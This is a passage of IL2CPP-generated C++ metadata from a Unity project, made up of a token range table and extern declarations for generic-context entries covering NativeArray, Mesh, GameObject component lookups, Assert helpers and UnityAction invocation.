{ 0x06000590, { 138, 5 } },
{ 0x06000592, { 143, 2 } },
{ 0x0600059C, { 145, 2 } },
{ 0x060005C3, { 147, 1 } },
{ 0x060005C4, { 148, 1 } },
{ 0x060005C5, { 149, 1 } },
{ 0x060005C6, { 150, 1 } },
{ 0x060005D0, { 151, 2 } },
{ 0x060005D1, { 153, 2 } },
{ 0x0600071A, { 155, 1 } },
{ 0x0600071B, { 156, 3 } },
{ 0x0600071C, { 159, 4 } },
{ 0x0600071E, { 163, 1 } },
{ 0x0600071F, { 164, 3 } },
{ 0x06000720, { 167, 4 } },
{ 0x06000722, { 171, 1 } },
{ 0x06000723, { 172, 2 } },
{ 0x06000725, { 174, 1 } },
{ 0x06000726, { 175, 2 } },
{ 0x0600073E, { 177, 2 } },
{ 0x060008A0, { 283, 1 } },
{ 0x060008BC, { 284, 2 } },
{ 0x060008BD, { 286, 2 } },
{ 0x060008BE, { 288, 2 } },
{ 0x060008BF, { 290, 2 } },
{ 0x060008C0, { 292, 2 } },
{ 0x060008C1, { 294, 2 } },
{ 0x060008C2, { 296, 2 } },
{ 0x060008C3, { 298, 2 } },
{ 0x060008C4, { 300, 2 } },
{ 0x060008C5, { 302, 2 } },
{ 0x060008C6, { 304, 2 } },
{ 0x060008C7, { 306, 2 } },
{ 0x060008C8, { 308, 2 } },
{ 0x060008C9, { 310, 2 } },
{ 0x060008CA, { 312, 2 } },
{ 0x060008CB, { 314, 2 } },
{ 0x060008CC, { 316, 2 } },
{ 0x060008CD, { 318, 4 } },
{ 0x060008CE, { 322, 2 } },
{ 0x060008CF, { 324, 2 } },
{ 0x060008D0, { 326, 2 } },
{ 0x060008D1, { 328, 2 } },
{ 0x060008D3, { 330, 4 } },
{ 0x060008EF, { 334, 1 } },
{ 0x060008F0, { 335, 1 } },
{ 0x06000932, { 336, 1 } },
{ 0x06000935, { 337, 2 } },
{ 0x06000936, { 339, 2 } },
{ 0x06000937, { 341, 2 } },
{ 0x06000938, { 343, 4 } },
{ 0x06000939, { 347, 2 } },
{ 0x0600093A, { 349, 2 } },
{ 0x0600093B, { 351, 2 } },
{ 0x0600093C, { 353, 2 } },
{ 0x0600093E, { 355, 1 } },
};
extern const uint32_t g_rgctx_JobStruct_1_t079CB5B73BCE0841F55E4D6CDA6494A010297D8A;
extern const uint32_t g_rgctx_T_tF4AF2A128E0752ED064F922D7181D6824613BB02;
extern const Il2CppRGCTXConstrainedData g_rgctx_T_tF4AF2A128E0752ED064F922D7181D6824613BB02_IJob_Execute_m6FB7F8EFAB486DA016EA24BB9BED238B4FC4DA27;
extern const uint32_t g_rgctx_T_tF4AF2A128E0752ED064F922D7181D6824613BB02;
extern const uint32_t g_rgctx_JobStruct_1_Execute_m0AAADCBE5D90D1000B3D704B14EB5408438E1CCD;
extern const uint32_t g_rgctx_ExecuteJobFunction_t4512BFE0B86D90D2328A29F4BCD80437EACDA954;
extern const uint32_t g_rgctx_ExecuteJobFunction__ctor_mB59C9E8588B3AFEFC7979AF159ED46EAF96ED5E7;
extern const uint32_t g_rgctx_JobStruct_1_t9B14DC02939321AF08B0D9861EC2DE39FB2699ED;
extern const uint32_t g_rgctx_ParallelForJobStruct_1_t2887542AB5333DED2947E8B2B7688E18794D2239;
extern const uint32_t g_rgctx_T_tFDC1689AE74A499B29AEBBF350042D7BEB5DF421;
extern const Il2CppRGCTXConstrainedData g_rgctx_T_tFDC1689AE74A499B29AEBBF350042D7BEB5DF421_IJobParallelFor_Execute_m424D27AF3C66D5013E807D6FFF6B8E5D75A3DE82;
extern const uint32_t g_rgctx_T_tFDC1689AE74A499B29AEBBF350042D7BEB5DF421;
extern const uint32_t g_rgctx_ParallelForJobStruct_1_Execute_mB120582907B13544F0AEFAA15E6BC96C1C70418F;
extern const uint32_t g_rgctx_ExecuteJobFunction_tD105541081E8AB3594F9FCA208DFBC84B1426C32;
extern const uint32_t g_rgctx_ExecuteJobFunction__ctor_m13591A35F12C3D8441B1DA0B8DF1983DF3835D8F;
extern const uint32_t g_rgctx_ParallelForJobStruct_1_tEF5B83079821A31EF124E43C06E887A9F3325A10;
extern const uint32_t g_rgctx_NativeArray_1_Allocate_m60649E26AC5304C543B02042550E51A7D463C303;
extern const uint32_t g_rgctx_NativeArray_1_t9FED9BA6969776FB13D9111EB338E0273EE689F7;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_m61D616F8FC61F82F84449EC8C33B06BA3E1C6966;
extern const uint32_t g_rgctx_NativeArray_1_Copy_m6308887AADFF57218232AE27ED8FC936C3F6ABD9;
extern const uint32_t g_rgctx_UnsafeUtility_AlignOf_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_mEFEE041A96D654E4553F89C6BCCA3E640B9D5B05;
extern const uint32_t g_rgctx_UnsafeUtility_ReadArrayElement_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_m22920B967F49CAC1797C3E4CA48B3C12C63D94AF;
extern const uint32_t g_rgctx_UnsafeUtility_WriteArrayElement_TisT_t05490BB68E93F7FF07D46087FEC0242A3FB9D022_m787E5CA4A9724FDD18197EA23B0CCAC37626A0ED;
extern const uint32_t g_rgctx_NativeArray_1_Copy_m3565072C1980A9D12B35F7F39A33511D7AB14718;
extern const uint32_t g_rgctx_TU5BU5D_t27376E1E4CDE114D84EA76275CB9D10E1C6D9A7B;
extern const uint32_t g_rgctx_NativeArray_1_Copy_m77ADC4C5DB7BFBBCFA6114150D1C0DFF0383BEA5;
extern const uint32_t g_rgctx_Enumerator_tE2EF59F915D6B7F2A37C947360340D614063ACE2;
extern const uint32_t g_rgctx_Enumerator__ctor_m0E321AD2EF64898A83F9AE834A7C248665FF10C7;
extern const uint32_t g_rgctx_NativeArray_1_GetEnumerator_mA95B7D8B0D3419D5CBE4A7D8A2A2E2D57757AB0C;
extern const uint32_t g_rgctx_NativeArray_1_t9FED9BA6969776FB13D9111EB338E0273EE689F7;
extern const uint32_t g_rgctx_NativeArray_1_Equals_mA006DE1192EAB16EF588E028577FA5169BABD1C5;
extern const uint32_t g_rgctx_NativeArray_1_Copy_mA942412A07ACB176B4BB4284392869058329C990;
extern const uint32_t g_rgctx_Enumerator_get_Current_m5D805336760473EF350CA58A4BB168EB1997843A;
extern const uint32_t g_rgctx_T_tCB2B4AD90EC47251952F0D7CF84CE2365DFB7790;
extern const uint32_t g_rgctx_NativeSlice_1_tC58EE9C5F48409C0DD10A5E992370AE3A8A55539;
extern const uint32_t g_rgctx_NativeSlice_1__ctor_m745559B94C1453A37E437E965C8D8D52ED85B5A0;
extern const uint32_t g_rgctx_NativeSlice_1_t3114B8E2EAA60048AD33FCFD3B980D459207EEA7;
extern const uint32_t g_rgctx_NativeSlice_1__ctor_m9EB5F63B4F4701E8807E28F760B656F57B388ADD;
extern const uint32_t g_rgctx_NativeSlice_1__ctor_mC7DE9713D4F8CB41CB3FD5BADF83BB8A16F7DDFF;
extern const uint32_t g_rgctx_NativeSlice_1_tA97EC884413647283F01C67B3BC95ED41379C2F3;
extern const uint32_t g_rgctx_NativeSlice_1__ctor_m0A772F5B6F5EA9FE33FC4CF88229B18484B5F5E5;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m7489446AE88724EA66F526B05743889C02F56C0F;
extern const uint32_t g_rgctx_UnsafeUtility_ReadArrayElementWithStride_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_mADBB37B5A41212DDDACB97E315F631496B914E6C;
extern const uint32_t g_rgctx_UnsafeUtility_WriteArrayElementWithStride_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m6432627C856E0BEB57E2BD02A4BD1AFAC3B7AA90;
extern const uint32_t g_rgctx_NativeSliceUnsafeUtility_GetUnsafePtr_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m08BBE0E3CD809E62A863B771CF278D28A7E4EDBB;
extern const uint32_t g_rgctx_NativeSlice_1_get_Stride_m79069541DC62D6377285836CD49CC0E3997649D0;
extern const uint32_t g_rgctx_NativeSliceUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_t50AD86EE4B2269E506CE7FEE3ED6AAD25BCDF5A9_m8092BBB0411F7D34F72793C9D65A973370DA5ADB;
extern const uint32_t g_rgctx_Enumerator_t95EA745781BCCF798D9EFFE1A0E070FBFC471F8F;
extern const uint32_t g_rgctx_Enumerator__ctor_m280BEF2360693542715D2254731108D51F0D8830;
extern const uint32_t g_rgctx_NativeSlice_1_GetEnumerator_m2FF71F9A2E042FD3D64B1BE8635DCA733CF26EB1;
extern const uint32_t g_rgctx_NativeSlice_1_Equals_m76AE404ED4B8F993C43EF94E215462326B919F30;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisU_tA1058349A06EDF870B28EF475B3941D46449D225_m5752883E0ADE6BA9DF8D0C962BB07660551BE2DB;
extern const uint32_t g_rgctx_NativeSlice_1_get_Length_m727DD3DA3EA23B15E5F9D5B51471CAA2E43C24F8;
extern const uint32_t g_rgctx_NativeSlice_1_get_Item_m6AEBECC0468FBA63C6D83222E8D3AE42194AF9AE;
extern const uint32_t g_rgctx_Enumerator_get_Current_m8BCA74F6B5B28EB47124ECF863E4F98531DE6C70;
extern const uint32_t g_rgctx_T_t6DEC264D110932E9F21C7E232C370F10210B8165;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisAlignOfHelper_1_t5DFC059C73842786E56F78D02694EEC1475F75E6_m80C03AC0502A6818887311F379D7DF6967B2F741;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_tD34127A53D13AA3FDD56126691FD0D925444F4C9_m90153DC65DFC62C3B4B30D2680A8BDC8E7411173;
extern const uint32_t g_rgctx_T_t36A57F9CE6EB234DE97351DCA9ED54BE9E078207;
extern const uint32_t g_rgctx_T_tF9333180B7DF78112D3B62D2E60EB4F10CC9E094;
extern const uint32_t g_rgctx_T_t0CC1D76DF14D95F8EACD9DB5B55E2C5EDD000035;
extern const uint32_t g_rgctx_UnsafeUtility_InternalEnumToInt_TisT_tB29353C098F40FCC8BA976D9D704CEF2284B5EE6_mFDAFF96F8E55560D6016C301F72B23BE7739C4D6;
extern const uint32_t g_rgctx_T_t86C21E83B47A2E7A1D3247A001F990A7986DB2D6;
extern const uint32_t g_rgctx_TU5BU5D_t7D16EB7F9A3D6DA46564839B3740450A2F527939;
extern const uint32_t g_rgctx_TU5BU5D_t7D16EB7F9A3D6DA46564839B3740450A2F527939;
extern const uint32_t g_rgctx_Mesh_GetAllocArrayFromChannel_TisT_t37CF6268F33923438D7CC8E15A2B9E3CA15DF7C1_mB02197DF665AA05616216157D8895B7818B81121;
extern const uint32_t g_rgctx_NoAllocHelpers_SafeLength_TisT_t0DCE4B4060595856884B9A3C03499720761720E7_mCC3053C857AB5ED9B3177B74280FC5426D742AD4;
extern const uint32_t g_rgctx_NoAllocHelpers_SafeLength_TisT_t3B82752A9C5C210D3D8FC85C28D365C3241482D3_m48331505E12A674E232789315F7A8DFCD1ED0408;
extern const uint32_t g_rgctx_Mesh_GetListForChannel_TisT_tE4FAA5DDEC4D323662045B0868386FF42AF7CC9A_mF6E578309A2A7AB8B4F9261CA80E45C4BC3EBA57;
extern const uint32_t g_rgctx_List_1_tCA88055D3747C3BE6B5EECA9E34429F66AA43A6F;
extern const uint32_t g_rgctx_List_1_Clear_m09903AE25F21B4B38417BE0A711FFCC66E032E2C;
extern const uint32_t g_rgctx_NoAllocHelpers_EnsureListElemCount_TisT_t175569283E6C6A13DD1949EA7FD00D9222090F79_mF72C7BAC6C7A87FDB4E0F07D1D27A902E3767ABC;
extern const uint32_t g_rgctx_Mesh_SetVertices_TisT_t0B4C7345A0182B762837F7D5827740BB2818C097_m3B84FD7D3DBC2508BB87E880A502DF3630D2DE6F;
extern const uint32_t g_rgctx_Mesh_SetVertices_TisT_t7536340F14B98A30E1268BDADE3EC060BD308B49_mABB5EB2D7B23299963D9E3B6A0CA94AFD2310F14;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_tFDA5AA791596471D299A369BC2F8310C2EF0AD95_mCC3897C1FCA626987680963AC3B1B19DB3B85DC8;
extern const uint32_t g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_tFDA5AA791596471D299A369BC2F8310C2EF0AD95_mA09A2F3E237AE3DB029B892370A934CA7B4D85F8;
extern const uint32_t g_rgctx_Mesh_SetNormals_TisT_tC607F46DCF75201084ED8E28FA6A5C8383564534_mECA6410E7E7422079D34858DACED35B71C41B43B;
extern const uint32_t g_rgctx_Mesh_SetNormals_TisT_tD696723E39C98F2ADBBDF925AC8351D23C7C9478_m8BB43D611463CA0E8084406CA468FF1F065E1A65;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_t1FDC3E19064B2179CCA215183E519B2C3312464D_m823A2A5605D990D1F208C4BBEB02549527EC0A09;
extern const uint32_t g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_t1FDC3E19064B2179CCA215183E519B2C3312464D_m527A06200587E2EEC9BCF78098BFCFE974D08AF9;
extern const uint32_t g_rgctx_Mesh_SetListForChannel_TisT_t9A2EC75898A21D54F6DCC115311D500F06E96113_mEF92BF2023B83F28BB730B7C75EB7C16A718FB80;
extern const uint32_t g_rgctx_Mesh_SetUVs_TisT_t4B4C02E9C5F14F2FD8E6804243A2C270E49E38A4_m9D484D7E8A5AC43CFF895334F9FF67DD84DC8DC4;
extern const uint32_t g_rgctx_Mesh_SetUVs_TisT_t35EB68B1F0E6DC9F74FE19A3560A67B20FF67822_m4F238422E100500C73CD9F5BF0683E38447C59B4;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_t7435D448385A6AE47E0CB57AFF08EB6D2D6DAC86_mF9B891EDC8235D1C797F908F8A47A286B3697705;
extern const uint32_t g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_t7435D448385A6AE47E0CB57AFF08EB6D2D6DAC86_m0CE0140166B47EBBE15A7C07A7D5DBEA506F2424;
extern const uint32_t g_rgctx_Mesh_GetListForChannel_TisT_t043AAD067EDE16218EE3DC6816E26FD55FA17DA0_mEC4B1C6015865F58BF89DE007185566C2664CEA9;
extern const uint32_t g_rgctx_Mesh_SetIndices_TisT_t583F7FC8B4B2CAE2EF0FC6BDD3DA2C2DDE8C107B_mFD1D4E0D262C7297E9A44D56CA3B43245158445A;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_tBE64DC63858A443829B10211B7D0617F3B3B9526_m08DB2BDD48956713DA67146D4771F35C7268D531;
extern const uint32_t g_rgctx_NativeArrayUnsafeUtility_GetUnsafeReadOnlyPtr_TisT_tBE64DC63858A443829B10211B7D0617F3B3B9526_mE49EA0B97BF67D78232171B0007319ADD6230ED1;
extern const uint32_t g_rgctx_UnsafeUtility_SizeOf_TisT_t7DC7F18AC34B88CECD08C33869772F0CF80DAD83_m2AA4B584E4A94514A0E469694C6E7FA9891541BD;
extern const uint32_t g_rgctx_NativeArrayUnsafeUtility_ConvertExistingDataToNativeArray_TisT_t7DC7F18AC34B88CECD08C33869772F0CF80DAD83_m536320CB72769E7A0E6D0317B2E52B1BEDBF1FDA;
extern const uint32_t g_rgctx_TU5BU5D_t681B41BEC9D0C2C9AFE3AE851F3F76A73C0D3894;
extern const uint32_t g_rgctx_T_t84CBEB9DFC6DD42800A16EAC4ECA7A2D9D1EDE4A;
extern const uint32_t g_rgctx_T_t796CA028A9FB1B7608F6D7A11E551421A7EED69D;
extern const uint32_t g_rgctx_T_t796CA028A9FB1B7608F6D7A11E551421A7EED69D;
extern const uint32_t g_rgctx_T_tFAEEE4BD596F2DE065BA8A08FA9ED286762E4699;
extern const uint32_t g_rgctx_T_tFAEEE4BD596F2DE065BA8A08FA9ED286762E4699;
extern const uint32_t g_rgctx_T_tDC702EDFC2EDB52DB571C54742E67C9CCBC8E7A4;
extern const uint32_t g_rgctx_T_tDC702EDFC2EDB52DB571C54742E67C9CCBC8E7A4;
extern const uint32_t g_rgctx_T_t1E55920ACC166F48B3917FD084904933E8AFE7F1;
extern const uint32_t g_rgctx_GameObject_TryGetComponent_TisT_tB1F6DD69B042B9F85E5ED839A13AB996B6B0E29F_m86E929B8246AD84B1280DFE88845E1300D48AE7D;
extern const uint32_t g_rgctx_T_t15C649661EFEF4630AEAB738C610F68EA352E1B2;
extern const uint32_t g_rgctx_T_t15C649661EFEF4630AEAB738C610F68EA352E1B2;
extern const uint32_t g_rgctx_GameObject_GetComponentsInChildren_TisT_t9C4229D45A3436A8EDA0B78CCC78E44565A33075_m7213955683A0BAC293DA97EC19475773D46CDA2A;
extern const uint32_t g_rgctx_GameObject_GetComponentsInChildren_TisT_tEE186EBF77E976372E60AED47266A1391821BBD4_m314D3FD4EFC1C7A9CFE0784793EA17B10261EDFF;
extern const uint32_t g_rgctx_Component_GetComponentsInChildren_TisT_tD5232F456914D3CCFC14A4ECEC7232A49FD3FC44_m16F98BE92AF7AD3D2C7B18FC4106DEBA58ED65A8;
extern const uint32_t g_rgctx_Component_GetComponentsInChildren_TisT_t70879F5D1F734F88B350043E60CA45605BB03E57_m7797C0739D8065443FB967F47A8082235CC72AAF;
extern const uint32_t g_rgctx_T_t2A6C94BDAF110BD8403F6F2865F59F93528931C5;
extern const uint32_t g_rgctx_T_t2A6C94BDAF110BD8403F6F2865F59F93528931C5;
extern const uint32_t g_rgctx_GameObject_GetComponentsInParent_TisT_t13EC64AE8BCA0B052F8A55A4F7590FF973A3A9BF_m9FF1CFAB7F148ACAA269FF734BFB2DEFBDB11DC3;
extern const uint32_t g_rgctx_GameObject_GetComponentsInParent_TisT_t265302F3B091FB653AAB70FF196133D4DF0599D5_m5DD4866C643C34561D9C6E80E93AC4D2686147D4;
extern const uint32_t g_rgctx_Component_GetComponentsInParent_TisT_tE9CB3070184311E4DEB32802D1C766A19BBD057B_mE6EE65B4D8809935B84A4C756E27C532384C2B94;
extern const uint32_t g_rgctx_T_t47581EF4E1C5D4D48A07717EFF6B45DD55F0BC77;
extern const uint32_t g_rgctx_GameObject_GetComponents_TisT_tD486D49B2768692B2DFF7DB4A894D40A69E0021D_m89A6C2FC256BD38ABF9BA1FED0B5CC129FCC0063;
extern const uint32_t g_rgctx_T_tB259E176CED00288F986516129580EFD8D4AC4E7;
extern const uint32_t g_rgctx_GameObject_GetComponentInChildren_TisT_tF7E65CEFF1A6E9ECF1C91FF28C04D64CBDC6C508_m7125E43B89963DC84A0F5E247343423D9A8E0A39;
extern const uint32_t g_rgctx_T_t2BE0BE87029DEAA33F169A0B03C82C3C144D13EF;
extern const uint32_t g_rgctx_T_t2BE0BE87029DEAA33F169A0B03C82C3C144D13EF;
extern const uint32_t g_rgctx_GameObject_GetComponentInParent_TisT_tC8A36AFF723260461A0F52D73082E9632C021261_m6923AFC7739625B6E62C33009597CFC8B5DE11DD;
extern const uint32_t g_rgctx_T_t03A438CAD8F43C95AEAEBCDB0C5E4B7E377C521A;
extern const uint32_t g_rgctx_T_t03A438CAD8F43C95AEAEBCDB0C5E4B7E377C521A;
extern const uint32_t g_rgctx_T_tE3707E950CC3E6F7B2FED3F3C488B2E13964BE1B;
extern const uint32_t g_rgctx_TU5BU5D_t4B58FED69931A702C4CDE236963F576AB35697E9;
extern const uint32_t g_rgctx_T_tAC38CEEB07F60B53F887995965E1C3FF46090B2C;
extern const uint32_t g_rgctx_T_tDA9113C1B891D47285D948EFD16B87B90B3D1538;
extern const uint32_t g_rgctx_TU5BU5D_t69B4917BCF2456954F2E7F9DF106821544E242BD;
extern const uint32_t g_rgctx_T_tDCECE57B5AADF34806B5C7C69A129CD977BFD4E6;
extern const uint32_t g_rgctx_GameObject_GetComponentsInChildren_TisT_tAD86F214A7F1E12B6807EFCEC11E4321C8609B1D_m136992AE3C6BF3178C2771647A2674A5F780EE0D;
extern const uint32_t g_rgctx_T_tADCF0C6EA7FA2FB920AB65E71CFF37A8EC63F977;
extern const uint32_t g_rgctx_T_tE0F624BB3415CD6A7022ABD2FEAF02175C649724;
extern const uint32_t g_rgctx_TU5BU5D_tD91BEA4D5423357326FA8F9E4045AB7147FADA56;
extern const uint32_t g_rgctx_T_tBEDE8BBE5DC8F74672BAD75661002C63A79E83E7;
extern const uint32_t g_rgctx_T_tBEDE8BBE5DC8F74672BAD75661002C63A79E83E7;
extern const uint32_t g_rgctx_T_t7221EA77A9457E95161C641D88DD8D4463B59C66;
extern const uint32_t g_rgctx_T_t7221EA77A9457E95161C641D88DD8D4463B59C66;
extern const uint32_t g_rgctx_List_1_t8EE2439A76F7EC4A05A26B03ADAC168403CA1A47;
extern const uint32_t g_rgctx_List_1_get_Capacity_m4A3F99A922755A5DAFD3364B6CCB11E6F92B2427;
extern const uint32_t g_rgctx_List_1_get_Count_m5865B724A17582510181F1B3DAE9361A1089FE79;
extern const uint32_t g_rgctx_List_1_tEE3249BCF0CFD15E7212FFE381C5AFB2BCBEFFF8;
extern const uint32_t g_rgctx_List_1_Clear_m12C9BA260689C8E1744559EF49B6EA88A2A3B124;
extern const uint32_t g_rgctx_List_1_get_Capacity_mA64D60606EF2EA00BFF65AE21BBBED3657D3879E;
extern const uint32_t g_rgctx_List_1_set_Capacity_m08212868D5FEDB3C72FEFF0F450698D7A6B71A28;
extern const uint32_t g_rgctx_NoAllocHelpers_ResizeList_TisT_t686D0C4E0CCD640A22261BA61EED64C2DFEA7906_mE37ACFEEC2A0E6228DFB37D5F7F9605E3D07B692;
extern const uint32_t g_rgctx_List_1_tAE739408B9BB3197E45852CACF01E1CB3B1D8B7A;
extern const uint32_t g_rgctx_List_1_get_Count_m4231DD6E53BBC7C914D17B64C722A04F9A424CFD;
extern const uint32_t g_rgctx_T_t20FE79E0D770BF19B63ED5B0712F0C07C47C2EBA;
extern const uint32_t g_rgctx_T_t20FE79E0D770BF19B63ED5B0712F0C07C47C2EBA;
extern const uint32_t g_rgctx_T_t9D32A6879A920CF78321BC657934895A9A6B16B3;
extern const uint32_t g_rgctx_T_tC1ACCAB10D35A2ADF17930B12A9CE02A088C8129;
extern const uint32_t g_rgctx_Object_Instantiate_TisT_t52F660631FB7F7BD0DE31C28286F86C3AA7CC15A_m970E0FC46C03A1F5705C31E7C152F44DC634D00A;
extern const uint32_t g_rgctx_T_t57F69BAD5D3AB2A698E5EAD2F8DB76DB87AE4D15;
extern const uint32_t g_rgctx_T_tB8DEE08EAC015A915685835C815E052C170F28E1;
extern const uint32_t g_rgctx_Resources_ConvertObjects_TisT_tB8DEE08EAC015A915685835C815E052C170F28E1_mEDA3EC2D7CA5F6FFD48973D4B9F68E691C01B605;
extern const uint32_t g_rgctx_T_tB0795F25B7B8C837F964F2C628D22F5B3FFE5187;
extern const uint32_t g_rgctx_T_tB0795F25B7B8C837F964F2C628D22F5B3FFE5187;
extern const uint32_t g_rgctx_Assert_AreEqual_TisT_tDE250F02250DA5BB278019D6514E4D8596392E44_m83E46242FCFE3AA33C8B2FCA66FFFE4919A8FDBB;
extern const uint32_t g_rgctx_EqualityComparer_1_get_Default_mA5809E8517D06200F76100875995377C6F96D4AA;
extern const uint32_t g_rgctx_EqualityComparer_1_t84DC958FF251CF642834642E8690A737CD9FA591;
extern const uint32_t g_rgctx_Assert_AreEqual_TisT_tE5927F2571A125C993D8F057CA124E7FC3DC8954_mA6A9ABD95AF38362C4703865C82EF3FBE9047D03;
extern const uint32_t g_rgctx_T_t52DA1E1D74BC97AC493E649650AC5F805703CD7F;
extern const uint32_t g_rgctx_T_t52DA1E1D74BC97AC493E649650AC5F805703CD7F;
extern const uint32_t g_rgctx_IEqualityComparer_1_t1FD700A0181624E6FBE4BBABD5E6EFBA8DF6D0F1;
extern const uint32_t g_rgctx_IEqualityComparer_1_Equals_m1A8F2EE125B95E0B3F733FB8B1E75CFC5527AA8E;
extern const uint32_t g_rgctx_Assert_AreNotEqual_TisT_t1B796CA7C10061E01C0A80F0EF1150A07E25978B_m57A4936E64BBBCE56B38B1C17474C69ADBA119E1;
extern const uint32_t g_rgctx_EqualityComparer_1_get_Default_m3BE171F79782D83EDD03B05B63AAC87FB7195C0A;
extern const uint32_t g_rgctx_EqualityComparer_1_t98561A291AD1CA165F244E1BBCCAB3DE0F2B128B;
extern const uint32_t g_rgctx_Assert_AreNotEqual_TisT_t6EAA416070F6D392C8011B0D278FACBA1D69AFA7_mAAD48C8795D6E83610A86B37AE943DC951A45A2D;
extern const uint32_t g_rgctx_T_tDF9BC11318A958DF7099DD7B0663AB49989474A5;
extern const uint32_t g_rgctx_T_tDF9BC11318A958DF7099DD7B0663AB49989474A5;
extern const uint32_t g_rgctx_IEqualityComparer_1_t2C6ABCD8F844051E4598D130E0095EB85127F3C3;
extern const uint32_t g_rgctx_IEqualityComparer_1_Equals_m4AC908BF9E4B3123EBC08F13294F00A1FE7FB770;
extern const uint32_t g_rgctx_Assert_IsNull_TisT_t0103B9CD45363DA40C752BA4F45E0684E93978A4_mC1288A479CB77993967403C63E2B93992580AB7D;
extern const uint32_t g_rgctx_T_tF5EF6247586A03EE4340C158010A5B224A9B6833;
extern const uint32_t g_rgctx_T_tF5EF6247586A03EE4340C158010A5B224A9B6833;
extern const uint32_t g_rgctx_Assert_IsNotNull_TisT_tD253C6F7A876FF11A9ACF475435EE3BAB4BED906_m47A66E6E0E45926791B2ED4D9E1C80A4F3EEC56E;
extern const uint32_t g_rgctx_T_t9EBB964C588A6F4EC7C9D5AEFB6A3261E23FC3BD;
extern const uint32_t g_rgctx_T_t9EBB964C588A6F4EC7C9D5AEFB6A3261E23FC3BD;
extern const uint32_t g_rgctx_T_t551CD9132A56187EAD25AF82497BCB4DCF1E8350;
extern const uint32_t g_rgctx_T_t551CD9132A56187EAD25AF82497BCB4DCF1E8350;
extern const uint32_t g_rgctx_UnityAction_1_tCCA8583F35FD5AE88387AAD4E2261C24D9979824;
extern const uint32_t g_rgctx_UnityAction_1_tCCA8583F35FD5AE88387AAD4E2261C24D9979824;
extern const uint32_t g_rgctx_InvokableCall_1_add_Delegate_mECA9E6CE4BAD907A97BE5964BC2CF01178F9427A;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_t4A7981CB01490A2A7DA9FBF2B6226DF5A138F42E_m04E26D717AEDDA5FECFF175AD172D7666F245104;
extern const uint32_t g_rgctx_T1_t4A7981CB01490A2A7DA9FBF2B6226DF5A138F42E;
extern const uint32_t g_rgctx_UnityAction_1_Invoke_m6598320BD28F7690DC297C2D1F87436595246AD2;
extern const uint32_t g_rgctx_UnityAction_2_tA5FBFB62634255D0C1C76ED53ED268910F21D441;
extern const uint32_t g_rgctx_UnityAction_2_tA5FBFB62634255D0C1C76ED53ED268910F21D441;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_t9D4999D88C7B830ABB2D05D533BCBEEDD1143578_mC78D5F83CF9069093241E3173261ED62EA857497;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT2_tF7E890566125E6432EE9E728DF2678F1FBD7624F_mAE2C52051303B194784BC699E786492269CE0892;
extern const uint32_t g_rgctx_T1_t9D4999D88C7B830ABB2D05D533BCBEEDD1143578;
extern const uint32_t g_rgctx_T2_tF7E890566125E6432EE9E728DF2678F1FBD7624F;
extern const uint32_t g_rgctx_UnityAction_2_Invoke_m7B3D91E337EE5BAED8EA3215A76E80E739B4B426;
extern const uint32_t g_rgctx_UnityAction_3_tB802B24846E106C51390123789ECCE1427B772DB;
extern const uint32_t g_rgctx_UnityAction_3_tB802B24846E106C51390123789ECCE1427B772DB;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_tDD0CBCE6751A7AA6283525B34926445E9E8AE9CD_m962A6767B9633856AE423D2CDF4F588AB16685D0;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT2_t96DEF47C17C0A95AF6486BBDB3BF783D23B0EEA4_mEC7A63981F2DFBA40DFFAD296F7EFA8E570000A1;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT3_tF187F110CB8F78B82DCD38B6B40A536930C3073A_mFC6BF62D55BB6C429FDB7D76D4397CF1C11B07FF;
extern const uint32_t g_rgctx_T1_tDD0CBCE6751A7AA6283525B34926445E9E8AE9CD;
extern const uint32_t g_rgctx_T2_t96DEF47C17C0A95AF6486BBDB3BF783D23B0EEA4;
extern const uint32_t g_rgctx_T3_tF187F110CB8F78B82DCD38B6B40A536930C3073A;
extern const uint32_t g_rgctx_UnityAction_3_Invoke_mA324678227155AC00FF70BE3C44323B457BFD798;
extern const uint32_t g_rgctx_UnityAction_4_tFE7F69F55A61B1C94EA4396BA51831F006EF45C1;
extern const uint32_t g_rgctx_UnityAction_4_tFE7F69F55A61B1C94EA4396BA51831F006EF45C1;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT1_tCE3D89B38CA521697C593DAE4D82CAFBB2C9ED94_mE83BAB69E0592AEE60CE0152499F0C22C2E6322E;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT2_t34D887E41D241A60221CA639979D3D4F38703E87_m3F52A56242C7E028162E45188D795E629B2D8F5C;
extern const uint32_t g_rgctx_BaseInvokableCall_ThrowOnInvalidArg_TisT3_tFBD42D7B101B8A5CD76C71411573A51F3E2853CA_m0B7861A81FC3376DE20D3BEC1B30311A03B6BBC9;
